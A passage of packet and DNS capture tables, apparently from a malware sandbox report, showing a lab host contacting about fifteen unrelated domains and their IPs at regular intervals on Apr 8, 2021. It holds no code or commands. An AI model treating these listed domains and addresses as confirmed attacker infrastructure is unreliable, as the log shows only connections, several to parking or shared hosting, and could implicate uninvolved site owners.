Apr 8, 2021 10:48:55.141519070 CEST	80	49737	13.248.216.40	192.168.2.4
Apr 8, 2021 10:48:55.307358027 CEST	80	49737	13.248.216.40	192.168.2.4
Apr 8, 2021 10:48:55.307454109 CEST	80	49737	13.248.216.40	192.168.2.4
Apr 8, 2021 10:48:55.307897091 CEST	49737	80	192.168.2.4	13.248.216.40
Apr 8, 2021 10:48:55.319649935 CEST	80	49737	13.248.216.40	192.168.2.4
Apr 8, 2021 10:49:05.623529911 CEST	49742	80	192.168.2.4	135.181.58.27
Apr 8, 2021 10:49:05.674776077 CEST	80	49742	135.181.58.27	192.168.2.4
Apr 8, 2021 10:49:05.674967051 CEST	49742	80	192.168.2.4	135.181.58.27
Apr 8, 2021 10:49:05.675004959 CEST	49742	80	192.168.2.4	135.181.58.27
Apr 8, 2021 10:49:05.732067108 CEST	80	49742	135.181.58.27	192.168.2.4
Apr 8, 2021 10:49:05.732119083 CEST	80	49742	135.181.58.27	192.168.2.4
Apr 8, 2021 10:49:05.732193947 CEST	80	49742	135.181.58.27	192.168.2.4
Apr 8, 2021 10:49:05.732331991 CEST	49742	80	192.168.2.4	135.181.58.27
Apr 8, 2021 10:49:05.732392073 CEST	49742	80	192.168.2.4	135.181.58.27
Apr 8, 2021 10:49:05.780396938 CEST	80	49742	135.181.58.27	192.168.2.4
Apr 8, 2021 10:49:10.809366941 CEST	49743	80	192.168.2.4	64.32.22.102
Apr 8, 2021 10:49:10.974342108 CEST	80	49743	64.32.22.102	192.168.2.4
Apr 8, 2021 10:49:10.974803925 CEST	49743	80	192.168.2.4	64.32.22.102
Apr 8, 2021 10:49:10.974932909 CEST	49743	80	192.168.2.4	64.32.22.102
Apr 8, 2021 10:49:11.139417887 CEST	80	49743	64.32.22.102	192.168.2.4
Apr 8, 2021 10:49:11.139461040 CEST	80	49743	64.32.22.102	192.168.2.4
Apr 8, 2021 10:49:11.139472008 CEST	80	49743	64.32.22.102	192.168.2.4
Apr 8, 2021 10:49:11.139687061 CEST	49743	80	192.168.2.4	64.32.22.102
Apr 8, 2021 10:49:11.139733076 CEST	49743	80	192.168.2.4	64.32.22.102
Apr 8, 2021 10:49:11.303935051 CEST	80	49743	64.32.22.102	192.168.2.4
Apr 8, 2021 10:49:16.194564104 CEST	49755	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:16.206888914 CEST	80	49755	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:16.206983089 CEST	49755	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:16.207128048 CEST	49755	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:16.219321012 CEST	80	49755	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:16.320554018 CEST	80	49755	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:16.320580006 CEST	80	49755	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:16.320749998 CEST	49755	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:16.320787907 CEST	49755	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:16.333220959 CEST	80	49755	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:21.382102966 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.404936075 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.405776978 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.406011105 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.429078102 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577060938 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577083111 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577095985 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577105999 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577236891 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577260017 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577271938 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577286005 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577311993 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577328920 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577351093 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577356100 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577362061 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577368975 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577405930 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577411890 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577414989 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577418089 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577435970 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577450037 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577464104 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577490091 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577559948 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577570915 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577574015 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577575922 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577599049 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577616930 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.577785969 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.577841043 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.600424051 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.600462914 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.600488901 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.600512028 CEST	80	49758	64.190.62.111	192.168.2.4
Apr 8, 2021 10:49:21.600524902 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:21.600547075 CEST	49758	80	192.168.2.4	64.190.62.111
Apr 8, 2021 10:49:26.644073009 CEST	49759	80	192.168.2.4	185.230.60.177
Apr 8, 2021 10:49:26.759862900 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.760004044 CEST	49759	80	192.168.2.4	185.230.60.177
Apr 8, 2021 10:49:26.760282993 CEST	49759	80	192.168.2.4	185.230.60.177
Apr 8, 2021 10:49:26.876003981 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.951628923 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.951685905 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.951740026 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.951775074 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.951783895 CEST	49759	80	192.168.2.4	185.230.60.177
Apr 8, 2021 10:49:26.951812029 CEST	80	49759	185.230.60.177	192.168.2.4
Apr 8, 2021 10:49:26.951920033 CEST	49759	80	192.168.2.4	185.230.60.177
Apr 8, 2021 10:49:26.952037096 CEST	49759	80	192.168.2.4	185.230.60.177
Apr 8, 2021 10:49:32.014780998 CEST	49765	80	192.168.2.4	91.195.240.94
Apr 8, 2021 10:49:32.039190054 CEST	80	49765	91.195.240.94	192.168.2.4
Apr 8, 2021 10:49:32.039287090 CEST	49765	80	192.168.2.4	91.195.240.94
Apr 8, 2021 10:49:32.039463043 CEST	49765	80	192.168.2.4	91.195.240.94
Apr 8, 2021 10:49:32.063716888 CEST	80	49765	91.195.240.94	192.168.2.4
Apr 8, 2021 10:49:32.075167894 CEST	80	49765	91.195.240.94	192.168.2.4
Apr 8, 2021 10:49:32.075216055 CEST	80	49765	91.195.240.94	192.168.2.4
Apr 8, 2021 10:49:32.075386047 CEST	49765	80	192.168.2.4	91.195.240.94
Apr 8, 2021 10:49:32.075464964 CEST	49765	80	192.168.2.4	91.195.240.94
Apr 8, 2021 10:49:32.098134041 CEST	80	49765	91.195.240.94	192.168.2.4
Apr 8, 2021 10:49:37.460303068 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:37.615302086 CEST	80	49767	104.128.125.95	192.168.2.4
Apr 8, 2021 10:49:37.615490913 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:37.615808010 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:38.058896065 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:38.121599913 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:38.213879108 CEST	80	49767	104.128.125.95	192.168.2.4
Apr 8, 2021 10:49:38.221250057 CEST	80	49767	104.128.125.95	192.168.2.4
Apr 8, 2021 10:49:38.221271992 CEST	80	49767	104.128.125.95	192.168.2.4
Apr 8, 2021 10:49:38.221425056 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:38.221447945 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:38.230340004 CEST	80	49767	104.128.125.95	192.168.2.4
Apr 8, 2021 10:49:38.230706930 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:38.276458979 CEST	80	49767	104.128.125.95	192.168.2.4
Apr 8, 2021 10:49:38.276559114 CEST	49767	80	192.168.2.4	104.128.125.95
Apr 8, 2021 10:49:43.183597088 CEST	49768	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:43.196016073 CEST	80	49768	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:43.196187973 CEST	49768	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:43.196348906 CEST	49768	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:43.208849907 CEST	80	49768	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:43.311574936 CEST	80	49768	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:43.311600924 CEST	80	49768	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:43.311927080 CEST	49768	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:43.311971903 CEST	49768	80	192.168.2.4	34.102.136.180
Apr 8, 2021 10:49:43.324237108 CEST	80	49768	34.102.136.180	192.168.2.4
Apr 8, 2021 10:49:48.369561911 CEST	49770	80	192.168.2.4	62.116.130.8
Apr 8, 2021 10:49:48.391958952 CEST	80	49770	62.116.130.8	192.168.2.4
Apr 8, 2021 10:49:48.392105103 CEST	49770	80	192.168.2.4	62.116.130.8
Apr 8, 2021 10:49:48.392472029 CEST	49770	80	192.168.2.4	62.116.130.8
Apr 8, 2021 10:49:48.415127039 CEST	80	49770	62.116.130.8	192.168.2.4
Apr 8, 2021 10:49:48.428760052 CEST	80	49770	62.116.130.8	192.168.2.4
Apr 8, 2021 10:49:48.428777933 CEST	80	49770	62.116.130.8	192.168.2.4
Apr 8, 2021 10:49:48.428949118 CEST	49770	80	192.168.2.4	62.116.130.8
Apr 8, 2021 10:49:48.429121017 CEST	49770	80	192.168.2.4	62.116.130.8
Apr 8, 2021 10:49:48.451507092 CEST	80	49770	62.116.130.8	192.168.2.4
Apr 8, 2021 10:49:59.361555099 CEST	49773	80	192.168.2.4	156.254.221.72
Apr 8, 2021 10:49:59.555058002 CEST	80	49773	156.254.221.72	192.168.2.4
Apr 8, 2021 10:49:59.555521965 CEST	49773	80	192.168.2.4	156.254.221.72
Apr 8, 2021 10:50:00.378705978 CEST	49773	80	192.168.2.4	156.254.221.72
Apr 8, 2021 10:50:00.572139978 CEST	80	49773	156.254.221.72	192.168.2.4
Apr 8, 2021 10:50:00.575277090 CEST	80	49773	156.254.221.72	192.168.2.4
Apr 8, 2021 10:50:00.575295925 CEST	80	49773	156.254.221.72	192.168.2.4
Apr 8, 2021 10:50:00.575510025 CEST	49773	80	192.168.2.4	156.254.221.72
Apr 8, 2021 10:50:00.575843096 CEST	49773	80	192.168.2.4	156.254.221.72
Apr 8, 2021 10:50:00.769088984 CEST	80	49773	156.254.221.72	192.168.2.4
Apr 8, 2021 10:50:05.635595083 CEST	49777	80	192.168.2.4	198.54.117.215
Apr 8, 2021 10:50:05.817043066 CEST	80	49777	198.54.117.215	192.168.2.4
Apr 8, 2021 10:50:05.817195892 CEST	49777	80	192.168.2.4	198.54.117.215
Apr 8, 2021 10:50:05.817534924 CEST	49777	80	192.168.2.4	198.54.117.215
Apr 8, 2021 10:50:05.998861074 CEST	80	49777	198.54.117.215	192.168.2.4
Apr 8, 2021 10:50:05.998889923 CEST	80	49777	198.54.117.215	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:47:44.957789898 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 8, 2021 10:47:47.723849058 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:47:47.743160009 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:13.182699919 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:13.195238113 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:13.812042952 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:13.825560093 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:18.545295954 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:18.558226109 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:23.553997993 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:23.566504002 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:31.570205927 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:31.582928896 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:39.804501057 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:39.817284107 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:42.646214962 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:42.659003019 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:43.660104036 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:43.673937082 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:49.567555904 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:49.587600946 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:54.229969978 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:54.243041039 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 8, 2021 10:48:54.964912891 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:48:54.987523079 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:00.324605942 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:00.455733061 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:00.474431038 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:00.554574013 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:05.580651999 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:05.622571945 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:10.748123884 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:10.807682037 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:11.264971972 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:11.381993055 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:11.811759949 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:11.961067915 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:12.417824030 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:12.430886984 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:12.499572992 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:12.526094913 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:12.762901068 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:12.776384115 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:13.182151079 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:13.195466995 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:13.611567974 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:13.725305080 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:14.062154055 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:14.074790001 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:14.625284910 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:14.638209105 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:15.868083000 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:15.881073952 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:16.044861078 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:16.057391882 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:16.159521103 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:16.193547010 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:16.204226971 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:16.217571974 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:17.639309883 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:17.652179956 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:21.347358942 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:21.378154039 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:26.593446970 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:26.641731024 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:27.238945961 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:27.251588106 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:27.890868902 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:27.902767897 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:29.829518080 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:29.842056990 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:31.492182016 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:31.504622936 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:31.937010050 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:31.951236010 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:31.968797922 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:32.013699055 CEST	53	52752	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:32.468652964 CEST	60542	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:32.483134031 CEST	53	60542	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:37.136812925 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:37.457993031 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:43.143384933 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:43.182207108 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:46.088186979 CEST	50904	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:46.100574017 CEST	53	50904	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:48.334547997 CEST	57525	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:48.366859913 CEST	53	57525	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:49.858028889 CEST	53814	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:49.870970964 CEST	53	53814	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:53.462363005 CEST	53418	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:53.884182930 CEST	53	53418	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:58.071777105 CEST	62833	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:58.084578037 CEST	53	62833	8.8.8.8	192.168.2.4
Apr 8, 2021 10:49:59.069574118 CEST	59260	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:49:59.359829903 CEST	53	59260	8.8.8.8	192.168.2.4
Apr 8, 2021 10:50:00.540715933 CEST	49944	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:50:00.553673983 CEST	53	49944	8.8.8.8	192.168.2.4
Apr 8, 2021 10:50:01.262131929 CEST	63300	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:50:01.274245977 CEST	53	63300	8.8.8.8	192.168.2.4
Apr 8, 2021 10:50:02.204255104 CEST	61449	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:50:02.217500925 CEST	53	61449	8.8.8.8	192.168.2.4
Apr 8, 2021 10:50:05.582552910 CEST	51275	53	192.168.2.4	8.8.8.8
Apr 8, 2021 10:50:05.634023905 CEST	53	51275	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 10:48:49.567555904 CEST	192.168.2.4	8.8.8.8	0x9152	Standard query (0)	www.biehnrecords.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:48:54.964912891 CEST	192.168.2.4	8.8.8.8	0x245	Standard query (0)	www.bedpee.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:00.324605942 CEST	192.168.2.4	8.8.8.8	0xf223	Standard query (0)	www.stone-master.info	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:05.580651999 CEST	192.168.2.4	8.8.8.8	0x782f	Standard query (0)	www.pmrack.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.748123884 CEST	192.168.2.4	8.8.8.8	0x5a5c	Standard query (0)	www.serversexposed.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:16.159521103 CEST	192.168.2.4	8.8.8.8	0xb5c9	Standard query (0)	www.heliumhubs.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:21.347358942 CEST	192.168.2.4	8.8.8.8	0x793f	Standard query (0)	www.420vaca.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:26.593446970 CEST	192.168.2.4	8.8.8.8	0x7985	Standard query (0)	www.shujahumayun.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:31.968797922 CEST	192.168.2.4	8.8.8.8	0x2066	Standard query (0)	www.dottproject.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:37.136812925 CEST	192.168.2.4	8.8.8.8	0xd1cc	Standard query (0)	www.qcmax.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:43.143384933 CEST	192.168.2.4	8.8.8.8	0xb0a5	Standard query (0)	www.playfulpainters.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:48.334547997 CEST	192.168.2.4	8.8.8.8	0x3e76	Standard query (0)	www.autobrehna.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:53.462363005 CEST	192.168.2.4	8.8.8.8	0x150f	Standard query (0)	www.nagoyadoori.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:59.069574118 CEST	192.168.2.4	8.8.8.8	0xbcda	Standard query (0)	www.appgusher.com	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:05.582552910 CEST	192.168.2.4	8.8.8.8	0x6686	Standard query (0)	www.thesixteenthround.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 10:48:49.587600946 CEST	8.8.8.8	192.168.2.4	0x9152	No error (0)	www.biehnrecords.com	biehnrecords.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:48:49.587600946 CEST	8.8.8.8	192.168.2.4	0x9152	No error (0)	biehnrecords.com		184.168.131.241	A (IP address)	IN (0x0001)
Apr 8, 2021 10:48:54.987523079 CEST	8.8.8.8	192.168.2.4	0x245	No error (0)	www.bedpee.com		13.248.216.40	A (IP address)	IN (0x0001)
Apr 8, 2021 10:48:54.987523079 CEST	8.8.8.8	192.168.2.4	0x245	No error (0)	www.bedpee.com		76.223.65.111	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:00.554574013 CEST	8.8.8.8	192.168.2.4	0xf223	Name error (3)	www.stone-master.info	none	none	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:05.622571945 CEST	8.8.8.8	192.168.2.4	0x782f	No error (0)	www.pmrack.com	pmrack.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:05.622571945 CEST	8.8.8.8	192.168.2.4	0x782f	No error (0)	pmrack.com		135.181.58.27	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	www.serversexposed.com	parking.namesilo.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		64.32.22.102	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		198.251.81.30	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		45.58.190.82	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		107.161.23.204	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		192.161.187.200	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		168.235.88.209	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		70.39.125.244	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		188.164.131.200	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		198.251.84.92	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		204.188.203.155	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:10.807682037 CEST	8.8.8.8	192.168.2.4	0x5a5c	No error (0)	parking.namesilo.com		209.141.38.71	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:16.193547010 CEST	8.8.8.8	192.168.2.4	0xb5c9	No error (0)	www.heliumhubs.com	heliumhubs.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:16.193547010 CEST	8.8.8.8	192.168.2.4	0xb5c9	No error (0)	heliumhubs.com		34.102.136.180	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:21.378154039 CEST	8.8.8.8	192.168.2.4	0x793f	No error (0)	www.420vaca.com		64.190.62.111	A (IP address)	IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST	8.8.8.8	192.168.2.4	0x7985	No error (0)	www.shujahumayun.com	www135.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST	8.8.8.8	192.168.2.4	0x7985	No error (0)	www135.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 10:49:26.641731024 CEST	8.8.8.8	192.168.2.4	0x7985	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
